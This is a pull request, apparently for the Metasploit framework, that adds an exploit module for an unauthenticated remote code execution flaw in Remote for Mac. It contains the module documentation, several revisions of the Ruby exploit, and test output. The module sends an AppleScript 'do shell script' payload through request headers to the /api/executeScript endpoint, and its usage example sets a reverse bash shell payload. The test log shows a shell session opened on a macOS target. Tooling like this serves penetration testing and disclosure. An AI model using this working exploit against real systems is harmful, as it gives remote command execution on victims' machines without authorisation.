### PR TITLE
Add Remote for Mac 2025.6 unauthenticated RCE module

### DIFF
--- a/documentation/modules/exploit/osx/http/remote_for_mac_rce.md
+++ b/documentation/modules/exploit/osx/http/remote_for_mac_rce.md
@@ -1,0 +1,40 @@
+# Module Documentation: Remote for Mac 2025.6 - Unauthenticated RCE
+
+## Overview
+
+This module exploits an unauthenticated remote code execution (RCE) vulnerability in **Remote for Mac 2025.6**. When the **"Allow unknown devices"** setting is enabled (disabled by default), the `/api/executeScript` endpoint allows unauthenticated attackers to execute arbitrary AppleScript commands, including shell commands, on the target macOS system.
+
+**Exploit Author:** [Chokri Hammedi](https://packetstormsecurity.com/files/195347/)
+
+**Module Path:** `modules/exploits/osx/http/remote_for_mac_rce.rb`
+
+## Vulnerable Application
+
+- **Vendor:** Evgeny Cherpak
+- **Homepage:** [https://cherpake.com/](https://cherpake.com/)
+- **Download:** [https://cherpake.com/latest.php?os=mac](https://cherpake.com/latest.php?os=mac)
+- **Affected Version:** Remote for Mac 2025.6
+- **Tested on:** macOS Mojave 10.14.6
+
+## Vulnerability Details
+
+- **Endpoint:** `/api/executeScript`
+- **Vulnerability:** Missing authentication
+- **Trigger Condition:** The app must have **"Allow unknown devices"** enabled.
+- **Impact:** Full command execution as the logged-in user.
+
+The exploit sends a specially crafted GET request with AppleScript payload headers to the unauthenticated endpoint. The server executes the `do shell script` AppleScript, leading to remote command execution.
+
+## Usage Example
+
+From within `msfconsole`:
+
+```bash
+use exploit/osx/http/remote_for_mac_rce
+set RHOSTS 192.168.1.100
+set RPORT 443
+set SSL true
+set PAYLOAD cmd/unix/reverse_bash
+set LHOST 192.168.1.50
+run
+

--- a/modules/exploits/osx/http/remote_for_mac_rce.rb
+++ b/modules/exploits/osx/http/remote_for_mac_rce.rb
@@ -9,7 +9,6 @@
 # Tested on: macOS Mojave, macOS Ventura
 ##
 
-require 'msf/core'
 require 'json'
 
 class MetasploitModule < Msf::Exploit::Remote
@@ -19,38 +18,45 @@ class MetasploitModule < Msf::Exploit::Remote
   prepend Msf::Exploit::Remote::AutoCheck
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Remote for Mac 2025.6 - Unauthenticated RCE',
-      'Description'    => %q{
-        This module exploits an unauthenticated remote code execution vulnerability in
-        Remote for Mac 2025.6 via the /api/executeScript endpoint. When authentication is
-        disabled on the target system, it allows attackers to execute arbitrary AppleScript
-        commands, which can include shell commands via `do shell script`.
-      },
-      'License'        => MSF_LICENSE,
-      'Author'         => ['Chokri Hammedi (@blue0x1)'],
-      'References'     =>
-        [
-          ['URL', 'https://packetstormsecurity.com/files/195347/']
+    super(
+      update_info(
+        info,
+        'Name' => 'Remote for Mac 2025.6 - Unauthenticated RCE',
+        'Description' => %q{
+          This module exploits an unauthenticated remote code execution vulnerability in
+          Remote for Mac 2025.6 via the /api/executeScript endpoint. When authentication is
+          disabled on the target system, it allows attackers to execute arbitrary AppleScript
+          commands, which can include shell commands via `do shell script`.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => ['Chokri Hammedi (@blue0x1)'],
+        'References' => [
+          ['PACKETSTORM', 'https://packetstormsecurity.com/files/195347/']
         ],
-      'DisclosureDate' => '2025-05-25',
-      'Platform'       => 'unix',
-      'Arch'           => ARCH_CMD,
-      'Targets'        => [['Auto', {}]],
-      'DefaultTarget'  => 0,
-      'DefaultOptions' => {
-        'RPORT' => 49229,
-        'SSL'   => true
-      }
-    ))
+        'DisclosureDate' => '2025-05-27',
+        'Platform' => 'unix',
+        'Arch' => ARCH_CMD,
+        'Targets' => [['Auto', {}]],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'RPORT' => 49229,
+          'SSL' => true
+        },
+        'Notes' => {
+          'Stability' => [ 'CRASH_SAFE' ],
+          'Reliability' => [ 'REPEATABLE_SESSION' ],
+          'SideEffects' => [ 'ARTIFACTS_ON_DISK' ]
+        }
+      )
+    )
 
     register_options([
       Opt::RHOST(),
       Opt::RPORT(49229),
       OptBool.new('SSL', [true, 'Enable SSL/TLS', true]),
-      OptString.new('LHOST', [true, "Local host to receive reverse shell"]),
-      OptInt.new('LPORT', [true, "Local port to receive reverse shell", 4444]),
-      OptBool.new('FORCE', [false, "Force exploitation even if checks fail", false])
+      OptString.new('LHOST', [true, 'Local host to receive reverse shell']),
+      OptInt.new('LPORT', [true, 'Local port to receive reverse shell', 4444]),
+      OptBool.new('FORCE', [false, 'Force exploitation even if checks fail', false])
     ])
   end
 
@@ -58,9 +64,9 @@ class MetasploitModule < Msf::Exploit::Remote
     return CheckCode::Unknown('Skipping version/auth checks (--force)') if datastore['FORCE']
 
     res = send_request_cgi(
-      'uri'    => normalize_uri(target_uri.path, 'api', 'getVersion'),
+      'uri' => normalize_uri(target_uri.path, 'api', 'getVersion'),
       'method' => 'GET',
-      'ssl'    => datastore['SSL']
+      'ssl' => datastore['SSL']
     )
 
     return CheckCode::Unknown('No response from target') unless res && res.code == 200
@@ -90,25 +96,25 @@ class MetasploitModule < Msf::Exploit::Remote
     print_status("Generating reverse shell payload for #{datastore['LHOST']}:#{datastore['LPORT']}")
     cmd = payload.encoded
     escaped = cmd.gsub('\\', '\\\\\\').gsub('"', '\"')
-    applescript = %Q{do shell script "#{escaped}"}
+    applescript = %(do shell script "#{escaped}")
 
     print_status("Sending exploit to #{rhost}:#{rport} via AppleScript")
     res = send_request_cgi(
-      'uri'     => normalize_uri(target_uri.path, 'api', 'executeScript'),
-      'method'  => 'GET',
-      'ssl'     => datastore['SSL'],
+      'uri' => normalize_uri(target_uri.path, 'api', 'executeScript'),
+      'method' => 'GET',
+      'ssl' => datastore['SSL'],
       'headers' => {
-        'X-ClientToken'   => '1337',
-        'X-HostName'      => 'iFruit',
+        'X-ClientToken' => '1337',
+        'X-HostName' => 'iFruit',
         'X-HostFullModel' => 'iFruit19,2',
-        'X-Script'        => applescript,
-        'X-ScriptName'    => 'exploit',
-        'X-ScriptDelay'   => '0'
+        'X-Script' => applescript,
+        'X-ScriptName' => 'exploit',
+        'X-ScriptDelay' => '0'
       }
     )
 
     if res && res.code == 200
-      print_good("Payload delivered successfully. Awaiting session...")
+      print_good('Payload delivered successfully. Awaiting session...')
     else
       fail_with(Failure::Unknown, "Unexpected HTTP response: #{res ? res.code : 'no response'}")
     end

--- a/modules/exploits/osx/http/remote_for_mac_rce.rb
+++ b/modules/exploits/osx/http/remote_for_mac_rce.rb
@@ -96,11 +96,11 @@ class MetasploitModule < Msf::Exploit::Remote
       }
     )
 
+    print_status('Payload sent')
     if res&.code == 200
       print_good('Payload delivered successfully. Awaiting session...')
-    else
-      fail_with(Failure::UnexpectedReply, "Unexpected HTTP response: #{res&.code || 'no response'
-                                                                     }")
+      res_json = res.get_json_document
+      print_status("Received response: #{res_json['result']}")
     end
   end
 end

--- a/modules/exploits/osx/http/remote_for_mac_rce.rb
+++ b/modules/exploits/osx/http/remote_for_mac_rce.rb
@@ -31,9 +31,10 @@ class MetasploitModule < Msf::Exploit::Remote
         'License' => MSF_LICENSE,
         'Author' => ['Chokri Hammedi (@blue0x1)'],
         'References' => [
-          ['PACKETSTORM', 'https://packetstormsecurity.com/files/195347/']
+          ['URL', 'https://packetstorm.news/files/id/195347/']
         ],
         'DisclosureDate' => '2025-05-27',
+        'CVE' => 'Pending',
         'Platform' => 'unix',
         'Arch' => ARCH_CMD,
         'Targets' => [['Auto', {}]],

--- a/modules/exploits/osx/http/remote_for_mac_rce.rb
+++ b/modules/exploits/osx/http/remote_for_mac_rce.rb
@@ -24,7 +24,7 @@ class MetasploitModule < Msf::Exploit::Remote
           ['PACKETSTORM', '195347']
         ],
         'DisclosureDate' => '2025-05-27',
-        'Platform' => 'unix',
+        'Platform' => ['unix','osx'],
         'Arch' => ARCH_CMD,
         'Targets' => [['Auto', {}]],
         'DefaultTarget' => 0,
@@ -76,34 +76,36 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    print_status("Generating reverse shell payload for #{datastore['LHOST']}:#{datastore['LPORT']}")
-    cmd = payload.encoded
-    escaped = cmd.gsub('\\', '\\\\\\').gsub('"', '\"')
-    applescript = %(do shell script "#{escaped}")
+  print_status("Generating reverse shell payload for #{datastore['LHOST']}:#{datastore['LPORT']}")
+  cmd = payload.encoded
 
-    host_name = Rex::Text.rand_text_alpha(8)
-    host_model = "#{Rex::Text.rand_text_alpha(4)}#{rand(99)}"
-    script_name = Rex::Text.rand_text_alpha(8)
+   
+  applescript = %(do shell script "#{cmd}")
 
-    print_status("Sending exploit to #{rhost}:#{rport} via AppleScript")
-    res = send_request_cgi(
-      'uri' => normalize_uri(target_uri.path, 'api', 'executeScript'),
-      'method' => 'GET',
-      'headers' => {
-        'X-ClientToken' => Rex::Text.rand_text_numeric(4),
-        'X-HostName' => host_name,
-        'X-HostFullModel' => host_model,
-        'X-Script' => applescript,
-        'X-ScriptName' => script_name,
-        'X-ScriptDelay' => '0'
-      }
-    )
+  host_name = Rex::Text.rand_text_alpha(8)
+  host_model = "#{Rex::Text.rand_text_alpha(4)}#{rand(99)}"
+  script_name = Rex::Text.rand_text_alpha(8)
 
-    if res&.code == 200
-      print_good('Payload delivered successfully. Awaiting session...')
-    else
-      code = res&.code || 'no response'
-      fail_with(Failure::UnexpectedReply, "Unexpected HTTP response: #{code}")
-    end
+  print_status("Sending exploit to #{rhost}:#{rport} via AppleScript")
+  res = send_request_cgi(
+    'uri' => normalize_uri(target_uri.path, 'api', 'executeScript'),
+    'method' => 'GET',
+    'headers' => {
+      'X-ClientToken' => Rex::Text.rand_text_numeric(4),
+      'X-HostName' => host_name,
+      'X-HostFullModel' => host_model,
+      'X-Script' => applescript,
+      'X-ScriptName' => script_name,
+      'X-ScriptDelay' => '0'
+    }
+  )
+
+  if res&.code == 200
+    print_good('Payload delivered successfully. Awaiting session...')
+  else
+    code = res&.code || 'no response'
+    fail_with(Failure::UnexpectedReply, "Unexpected HTTP response: #{code}")
   end
+end
+
 end

--- a/modules/exploits/osx/http/remote_for_mac_rce.rb
+++ b/modules/exploits/osx/http/remote_for_mac_rce.rb
@@ -10,12 +10,13 @@ class MetasploitModule < Msf::Exploit::Remote
     super(
       update_info(
         info,
-        'Name' => 'Remote for Mac 2025.6 - Unauthenticated RCE',
+        'Name' => 'Remote for Mac <=2025.7 - Unauthenticated RCE',
         'Description' => %q{
           This module exploits an unauthenticated remote code execution vulnerability in
-          Remote for Mac 2025.6 via the /api/executeScript endpoint. When authentication is
-          disabled on the target system, it allows attackers to execute arbitrary AppleScript
-          commands, which can include shell commands via `do shell script`.
+          Remote for Mac versions up to 2025.7 via the /api/executeScript endpoint. 
+          When authentication is disabled on the target system, it allows attackers to execute 
+          arbitrary AppleScript commands, which can include shell commands via `do shell script`.
+          All versions before 2025.8 are vulnerable.
         },
         'License' => MSF_LICENSE,
         'Author' => ['Chokri Hammedi (@blue0x1)'],
@@ -58,11 +59,20 @@ class MetasploitModule < Msf::Exploit::Remote
       return CheckCode::Safe('Target requires authentication on /api/executeScript')
     end
 
-    if info.dig('version') != '2025.6'
-      return CheckCode::Safe("Target version is #{info['version']}, not vulnerable")
+    version = info.dig('version').to_s
+    if version.empty?
+      return CheckCode::Unknown('Could not determine target version')
     end
 
-    CheckCode::Appears
+    
+    normalized_version = version.gsub(/[^\d\.]/, '')
+    
+    
+    if normalized_version <= "2025.7"
+      return CheckCode::Appears
+    end
+
+    CheckCode::Safe("Target version #{version} is not vulnerable")
   end
 
   def exploit

--- a/modules/exploits/osx/http/remote_for_mac_rce.rb
+++ b/modules/exploits/osx/http/remote_for_mac_rce.rb
@@ -13,10 +13,10 @@ class MetasploitModule < Msf::Exploit::Remote
         'Name' => 'Remote for Mac <=2025.7 - Unauthenticated RCE',
         'Description' => %q{
           This module exploits an unauthenticated remote code execution vulnerability in
-          Remote for Mac versions up to 2025.7 via the /api/executeScript endpoint. 
-          When authentication is disabled on the target system, it allows attackers to execute 
+          Remote for Mac versions up to and including 2025.7 via the /api/executeScript endpoint.
+          When authentication is disabled on the target system, it allows attackers to execute
           arbitrary AppleScript commands, which can include shell commands via `do shell script`.
-          All versions before 2025.8 are vulnerable.
+          All versions up to 2025.7 (including patch versions) are vulnerable.
         },
         'License' => MSF_LICENSE,
         'Author' => ['Chokri Hammedi (@blue0x1)'],
@@ -33,9 +33,9 @@ class MetasploitModule < Msf::Exploit::Remote
           'SSL' => true
         },
         'Notes' => {
-          'Stability' => [ 'CRASH_SAFE' ],
-          'Reliability' => [ 'REPEATABLE_SESSION' ],
-          'SideEffects' => [ 'ARTIFACTS_ON_DISK' ]
+          'Stability' => ['CRASH_SAFE'],
+          'Reliability' => ['REPEATABLE_SESSION'],
+          'SideEffects' => ['ARTIFACTS_ON_DISK']
         }
       )
     )
@@ -64,48 +64,48 @@ class MetasploitModule < Msf::Exploit::Remote
       return CheckCode::Unknown('Could not determine target version')
     end
 
-    
-    normalized_version = version.gsub(/[^\d\.]/, '')
-    
-    
-    if normalized_version <= "2025.7"
-      return CheckCode::Appears
+    begin
+      target_version = Rex::Version.new(version)
+      vulnerable_version = Rex::Version.new('2025.7')
+      
+      if target_version <= vulnerable_version
+        return CheckCode::Appears
+      else
+        return CheckCode::Safe("Target version #{version} is not vulnerable")
+      end
+    rescue ArgumentError
+      return CheckCode::Unknown("Invalid version format: #{version}")
     end
-
-    CheckCode::Safe("Target version #{version} is not vulnerable")
   end
 
   def exploit
-  print_status("Generating reverse shell payload for #{datastore['LHOST']}:#{datastore['LPORT']}")
-  cmd = payload.encoded
+    print_status("Generating reverse shell payload for #{datastore['LHOST']}:#{datastore['LPORT']}")
+    cmd = payload.encoded
+    applescript = %(do shell script "#{cmd}")
 
-   
-  applescript = %(do shell script "#{cmd}")
+    host_name = Rex::Text.rand_text_alpha(8)
+    host_model = "#{Rex::Text.rand_text_alpha(4)}#{rand(99)}"
+    script_name = Rex::Text.rand_text_alpha(8)
 
-  host_name = Rex::Text.rand_text_alpha(8)
-  host_model = "#{Rex::Text.rand_text_alpha(4)}#{rand(99)}"
-  script_name = Rex::Text.rand_text_alpha(8)
+    print_status("Sending exploit to #{rhost}:#{rport} via AppleScript")
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'api', 'executeScript'),
+      'method' => 'GET',
+      'headers' => {
+        'X-ClientToken' => Rex::Text.rand_text_numeric(4),
+        'X-HostName' => host_name,
+        'X-HostFullModel' => host_model,
+        'X-Script' => applescript,
+        'X-ScriptName' => script_name,
+        'X-ScriptDelay' => '0'
+      }
+    )
 
-  print_status("Sending exploit to #{rhost}:#{rport} via AppleScript")
-  res = send_request_cgi(
-    'uri' => normalize_uri(target_uri.path, 'api', 'executeScript'),
-    'method' => 'GET',
-    'headers' => {
-      'X-ClientToken' => Rex::Text.rand_text_numeric(4),
-      'X-HostName' => host_name,
-      'X-HostFullModel' => host_model,
-      'X-Script' => applescript,
-      'X-ScriptName' => script_name,
-      'X-ScriptDelay' => '0'
-    }
-  )
-
-  if res&.code == 200
-    print_good('Payload delivered successfully. Awaiting session...')
-  else
-    code = res&.code || 'no response'
-    fail_with(Failure::UnexpectedReply, "Unexpected HTTP response: #{code}")
+    if res&.code == 200
+      print_good('Payload delivered successfully. Awaiting session...')
+    else
+      code = res&.code || 'no response'
+      fail_with(Failure::UnexpectedReply, "Unexpected HTTP response: #{code}")
+    end
   end
-end
-
 end

--- a/modules/exploits/osx/http/remote_for_mac_rce.rb
+++ b/modules/exploits/osx/http/remote_for_mac_rce.rb
@@ -10,7 +10,7 @@ class MetasploitModule < Msf::Exploit::Remote
     super(
       update_info(
         info,
-        'Name' => 'Remote for Mac <=2025.7 - Unauthenticated RCE',
+        'Name' => 'Remote for Mac <= 2025.7 - Unauthenticated RCE',
         'Description' => %q{
           This module exploits an unauthenticated remote code execution vulnerability in
           Remote for Mac versions up to and including 2025.7 via the /api/executeScript endpoint.

--- a/modules/exploits/osx/http/remote_for_mac_rce.rb
+++ b/modules/exploits/osx/http/remote_for_mac_rce.rb
@@ -32,9 +32,9 @@ class MetasploitModule < Msf::Exploit::Remote
           'SSL' => true
         },
         'Notes' => {
-          'Stability' => ['CRASH_SAFE'],
-          'Reliability' => ['REPEATABLE_SESSION'],
-          'SideEffects' => ['ARTIFACTS_ON_DISK']
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS]
         }
       )
     )

--- a/modules/exploits/osx/http/remote_for_mac_rce.rb
+++ b/modules/exploits/osx/http/remote_for_mac_rce.rb
@@ -1,14 +1,3 @@
-##
-# Exploit Title: Remote for Mac 2025.6 - Unauthenticated RCE MSF Module
-# Date: May 2025
-# Exploit Author: Chokri Hammedi (@chokri0x00)
-# Vendor Homepage: https://www.cherpake.com/
-# Software Link: https://cherpake.com/latest.php?os=mac
-# Exploit Source: https://packetstormsecurity.com/files/195347/
-# Version: Remote for Mac 2025.6
-# Tested on: macOS Mojave, macOS Ventura
-##
-
 require 'json'
 
 class MetasploitModule < Msf::Exploit::Remote
@@ -31,10 +20,9 @@ class MetasploitModule < Msf::Exploit::Remote
         'License' => MSF_LICENSE,
         'Author' => ['Chokri Hammedi (@blue0x1)'],
         'References' => [
-          ['URL', 'https://packetstorm.news/files/id/195347/']
+          ['PACKETSTORM', '195347']
         ],
         'DisclosureDate' => '2025-05-27',
-        'CVE' => 'Pending',
         'Platform' => 'unix',
         'Arch' => ARCH_CMD,
         'Targets' => [['Auto', {}]],
@@ -50,39 +38,27 @@ class MetasploitModule < Msf::Exploit::Remote
         }
       )
     )
-
-    register_options([
-      Opt::RHOST(),
-      Opt::RPORT(49229),
-      OptBool.new('SSL', [true, 'Enable SSL/TLS', true]),
-      OptString.new('LHOST', [true, 'Local host to receive reverse shell']),
-      OptInt.new('LPORT', [true, 'Local port to receive reverse shell', 4444]),
-      OptBool.new('FORCE', [false, 'Force exploitation even if checks fail', false])
-    ])
   end
 
   def check
-    return CheckCode::Unknown('Skipping version/auth checks (--force)') if datastore['FORCE']
-
     res = send_request_cgi(
       'uri' => normalize_uri(target_uri.path, 'api', 'getVersion'),
-      'method' => 'GET',
-      'ssl' => datastore['SSL']
+      'method' => 'GET'
     )
 
-    return CheckCode::Unknown('No response from target') unless res && res.code == 200
+    return CheckCode::Unknown('No response from target') unless res&.code == 200
 
-    begin
-      info = JSON.parse(res.body)
-    rescue JSON::ParserError
+    info = res.get_json_document
+
+    if info.empty?
       return CheckCode::Unknown('Unable to parse JSON from /api/getVersion')
     end
 
-    if info['requires.auth'] == true
+    if info.dig('requires.auth') == true
       return CheckCode::Safe('Target requires authentication on /api/executeScript')
     end
 
-    if info['version'] != '2025.6'
+    if info.dig('version') != '2025.6'
       return CheckCode::Safe("Target version is #{info['version']}, not vulnerable")
     end
 
@@ -90,34 +66,34 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    unless datastore['FORCE'] || check == CheckCode::Appears
-      fail_with(Failure::NotVulnerable, 'Target does not appear vulnerable')
-    end
-
     print_status("Generating reverse shell payload for #{datastore['LHOST']}:#{datastore['LPORT']}")
     cmd = payload.encoded
     escaped = cmd.gsub('\\', '\\\\\\').gsub('"', '\"')
     applescript = %(do shell script "#{escaped}")
 
+    host_name = Rex::Text.rand_text_alpha(8)
+    host_model = "#{Rex::Text.rand_text_alpha(4)}#{rand(99)}"
+    script_name = Rex::Text.rand_text_alpha(8)
+
     print_status("Sending exploit to #{rhost}:#{rport} via AppleScript")
     res = send_request_cgi(
       'uri' => normalize_uri(target_uri.path, 'api', 'executeScript'),
       'method' => 'GET',
-      'ssl' => datastore['SSL'],
       'headers' => {
-        'X-ClientToken' => '1337',
-        'X-HostName' => 'iFruit',
-        'X-HostFullModel' => 'iFruit19,2',
+        'X-ClientToken' => Rex::Text.rand_text_numeric(4),
+        'X-HostName' => host_name,
+        'X-HostFullModel' => host_model,
         'X-Script' => applescript,
-        'X-ScriptName' => 'exploit',
+        'X-ScriptName' => script_name,
         'X-ScriptDelay' => '0'
       }
     )
 
-    if res && res.code == 200
+    if res&.code == 200
       print_good('Payload delivered successfully. Awaiting session...')
     else
-      fail_with(Failure::Unknown, "Unexpected HTTP response: #{res ? res.code : 'no response'}")
+      code = res&.code || 'no response'
+      fail_with(Failure::UnexpectedReply, "Unexpected HTTP response: #{code}")
     end
   end
 end

--- a/modules/exploits/osx/http/remote_for_mac_rce.rb
+++ b/modules/exploits/osx/http/remote_for_mac_rce.rb
@@ -24,7 +24,7 @@ class MetasploitModule < Msf::Exploit::Remote
           ['PACKETSTORM', '195347']
         ],
         'DisclosureDate' => '2025-05-27',
-        'Platform' => ['unix','osx'],
+        'Platform' => ['unix', 'osx'],
         'Arch' => ARCH_CMD,
         'Targets' => [['Auto', {}]],
         'DefaultTarget' => 0,
@@ -55,11 +55,11 @@ class MetasploitModule < Msf::Exploit::Remote
       return CheckCode::Unknown('Unable to parse JSON from /api/getVersion')
     end
 
-    if info.dig('requires.auth') == true
+    if info['requires.auth'] == true
       return CheckCode::Safe('Target requires authentication on /api/executeScript')
     end
 
-    version = info.dig('version').to_s
+    version = info['version'].to_s
     if version.empty?
       return CheckCode::Unknown('Could not determine target version')
     end
@@ -67,7 +67,7 @@ class MetasploitModule < Msf::Exploit::Remote
     begin
       target_version = Rex::Version.new(version)
       vulnerable_version = Rex::Version.new('2025.7')
-      
+
       if target_version <= vulnerable_version
         return CheckCode::Appears
       else
@@ -104,8 +104,8 @@ class MetasploitModule < Msf::Exploit::Remote
     if res&.code == 200
       print_good('Payload delivered successfully. Awaiting session...')
     else
-      code = res&.code || 'no response'
-      fail_with(Failure::UnexpectedReply, "Unexpected HTTP response: #{code}")
+      fail_with(Failure::UnexpectedReply, "Unexpected HTTP response: #{res&.code || 'no response'
+                                                                     }")
     end
   end
 end

--- a/modules/exploits/osx/http/remote_for_mac_rce.rb
+++ b/modules/exploits/osx/http/remote_for_mac_rce.rb
@@ -10,7 +10,7 @@ class MetasploitModule < Msf::Exploit::Remote
     super(
       update_info(
         info,
-        'Name' => 'Remote for Mac <= 2025.7 - Unauthenticated RCE',
+        'Name' => 'Remote for Mac Unauthenticated RCE',
         'Description' => %q{
           This module exploits an unauthenticated remote code execution vulnerability in
           Remote for Mac versions up to and including 2025.7 via the /api/executeScript endpoint.
@@ -29,7 +29,6 @@ class MetasploitModule < Msf::Exploit::Remote
         'Targets' => [['Auto', {}]],
         'DefaultTarget' => 0,
         'DefaultOptions' => {
-          'RPORT' => 49229,
           'SSL' => true
         },
         'Notes' => {
@@ -64,17 +63,13 @@ class MetasploitModule < Msf::Exploit::Remote
       return CheckCode::Unknown('Could not determine target version')
     end
 
-    begin
-      target_version = Rex::Version.new(version)
-      vulnerable_version = Rex::Version.new('2025.7')
+    target_version = Rex::Version.new(version)
+    vulnerable_version = Rex::Version.new('2025.7')
 
-      if target_version <= vulnerable_version
-        return CheckCode::Appears
-      else
-        return CheckCode::Safe("Target version #{version} is not vulnerable")
-      end
-    rescue ArgumentError
-      return CheckCode::Unknown("Invalid version format: #{version}")
+    if target_version <= vulnerable_version
+      return CheckCode::Appears
+    else
+      return CheckCode::Safe("Target version #{version} is not vulnerable")
     end
   end
 

--- a/modules/exploits/osx/http/remote_for_mac_rce.rb
+++ b/modules/exploits/osx/http/remote_for_mac_rce.rb
@@ -1,0 +1,116 @@
+##
+# Exploit Title: Remote for Mac 2025.6 - Unauthenticated RCE MSF Module
+# Date: May 2025
+# Exploit Author: Chokri Hammedi (@chokri0x00)
+# Vendor Homepage: https://www.cherpake.com/
+# Software Link: https://cherpake.com/latest.php?os=mac
+# Exploit Source: https://packetstormsecurity.com/files/195347/
+# Version: Remote for Mac 2025.6
+# Tested on: macOS Mojave, macOS Ventura
+##
+
+require 'msf/core'
+require 'json'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Remote for Mac 2025.6 - Unauthenticated RCE',
+      'Description'    => %q{
+        This module exploits an unauthenticated remote code execution vulnerability in
+        Remote for Mac 2025.6 via the /api/executeScript endpoint. When authentication is
+        disabled on the target system, it allows attackers to execute arbitrary AppleScript
+        commands, which can include shell commands via `do shell script`.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         => ['Chokri Hammedi (@blue0x1)'],
+      'References'     =>
+        [
+          ['URL', 'https://packetstormsecurity.com/files/195347/']
+        ],
+      'DisclosureDate' => '2025-05-25',
+      'Platform'       => 'unix',
+      'Arch'           => ARCH_CMD,
+      'Targets'        => [['Auto', {}]],
+      'DefaultTarget'  => 0,
+      'DefaultOptions' => {
+        'RPORT' => 49229,
+        'SSL'   => true
+      }
+    ))
+
+    register_options([
+      Opt::RHOST(),
+      Opt::RPORT(49229),
+      OptBool.new('SSL', [true, 'Enable SSL/TLS', true]),
+      OptString.new('LHOST', [true, "Local host to receive reverse shell"]),
+      OptInt.new('LPORT', [true, "Local port to receive reverse shell", 4444]),
+      OptBool.new('FORCE', [false, "Force exploitation even if checks fail", false])
+    ])
+  end
+
+  def check
+    return CheckCode::Unknown('Skipping version/auth checks (--force)') if datastore['FORCE']
+
+    res = send_request_cgi(
+      'uri'    => normalize_uri(target_uri.path, 'api', 'getVersion'),
+      'method' => 'GET',
+      'ssl'    => datastore['SSL']
+    )
+
+    return CheckCode::Unknown('No response from target') unless res && res.code == 200
+
+    begin
+      info = JSON.parse(res.body)
+    rescue JSON::ParserError
+      return CheckCode::Unknown('Unable to parse JSON from /api/getVersion')
+    end
+
+    if info['requires.auth'] == true
+      return CheckCode::Safe('Target requires authentication on /api/executeScript')
+    end
+
+    if info['version'] != '2025.6'
+      return CheckCode::Safe("Target version is #{info['version']}, not vulnerable")
+    end
+
+    CheckCode::Appears
+  end
+
+  def exploit
+    unless datastore['FORCE'] || check == CheckCode::Appears
+      fail_with(Failure::NotVulnerable, 'Target does not appear vulnerable')
+    end
+
+    print_status("Generating reverse shell payload for #{datastore['LHOST']}:#{datastore['LPORT']}")
+    cmd = payload.encoded
+    escaped = cmd.gsub('\\', '\\\\\\').gsub('"', '\"')
+    applescript = %Q{do shell script "#{escaped}"}
+
+    print_status("Sending exploit to #{rhost}:#{rport} via AppleScript")
+    res = send_request_cgi(
+      'uri'     => normalize_uri(target_uri.path, 'api', 'executeScript'),
+      'method'  => 'GET',
+      'ssl'     => datastore['SSL'],
+      'headers' => {
+        'X-ClientToken'   => '1337',
+        'X-HostName'      => 'iFruit',
+        'X-HostFullModel' => 'iFruit19,2',
+        'X-Script'        => applescript,
+        'X-ScriptName'    => 'exploit',
+        'X-ScriptDelay'   => '0'
+      }
+    )
+
+    if res && res.code == 200
+      print_good("Payload delivered successfully. Awaiting session...")
+    else
+      fail_with(Failure::Unknown, "Unexpected HTTP response: #{res ? res.code : 'no response'}")
+    end
+  end
+end


### PR DESCRIPTION
## Vulnerability Details

This module exploits an unauthenticated Remote Code Execution vulnerability in Remote for Mac 2025.6. The flaw exists in the `/api/executeScript` endpoint which accepts AppleScript commands without any authentication when explicitly disabled by the user.

## Module Information

- Module path: `modules/exploits/osx/http/remote_for_mac_rce.rb`
- Platform: Unix/macOS
- Tested on: macOS Mojave, macOS Ventura
- Requirements: Authentication must be disabled on the target

## References

- [Original PoC - Packet Storm](https://packetstormsecurity.com/files/195347/)

## Test Output

[msf](Jobs:0 Agents:0) exploit(osx/http/remote_for_mac_rce) >> run
[*] Started reverse TCP handler on 192.168.8.101:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Generating reverse shell payload for 192.168.8.101:4444
[*] Sending exploit to 192.168.8.102:49229 via AppleScript
[*] Command shell session 2 opened (192.168.8.101:4444 -> 192.168.8.102:52640) at 2025-05-28 07:53:48 +0100
[+] Payload delivered successfully. Awaiting session...

uname
Darwin
/bin/bash -i
bash: no job control in this shell
bash-3.2$ uname -srm
Darwin 18.7.0 x86_64
